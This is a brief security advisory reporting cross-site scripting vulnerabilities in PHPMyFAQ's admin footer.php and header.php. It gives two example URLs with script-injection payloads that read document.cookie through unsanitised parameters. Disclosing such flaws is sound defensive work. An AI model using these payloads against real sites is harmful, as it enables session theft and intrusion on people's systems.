PHPMyFAQ Multiple Cross-Site Scripting Vulnerabilities

PHPMyFAQ Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/[path]/phpmyfaq/admin/footer.php?PMF_CONF[version]=<script>alert(document.cookie)</script>
http://www.example.com/[path]/phpmyfaq/admin/header.php?PMF_LANG[metaLanguage]="><script>alert(document.cookie)</script>